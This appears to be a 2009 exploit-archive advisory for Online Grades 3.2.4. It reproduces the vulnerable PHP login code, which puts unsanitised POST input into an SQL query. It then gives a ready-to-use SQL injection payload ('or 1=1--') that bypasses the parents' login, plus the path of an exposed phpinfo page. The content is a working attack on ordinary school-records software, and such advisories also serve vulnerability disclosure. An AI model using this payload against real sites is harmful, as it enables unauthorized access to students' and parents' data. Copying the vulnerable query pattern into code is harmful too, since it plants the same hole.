[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Online Grades 3.2.4 (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-02-03
# Author : x0r
# Previous Title : Simple Machines Forums (BBCode) Cookie Stealing Vulnerability
# Next Title : AJA Modules Rapidshare 1.0.0 Remote Shell Upload Vulnerability
#########################################################################################
[0x01] Informations:
Script : Online Grades 3.2.4
Download : http://www.onlinegrades.org
Vulnerability : Auth Bypass - Php Info Disclosure
Author : x0r
Contact : x0r@live.it andry2000@hotmail.it
Website : NULL
#########################################################################################
[0x02] Bug: /parents/login.php
$username = $_POST['uname']; $pword = $_POST['pass'];
$mysql_query = "SELECT * from PARENTS where client_id = '$username' and
client_pw = '$pword';";
#########################################################################################
[0x03] Exploit:
Exploit: [validemail] ' or ' 1=1--
Php Info: /includes/phpinfo.php
#########################################################################################
# www.Syue.com [2009-02-03]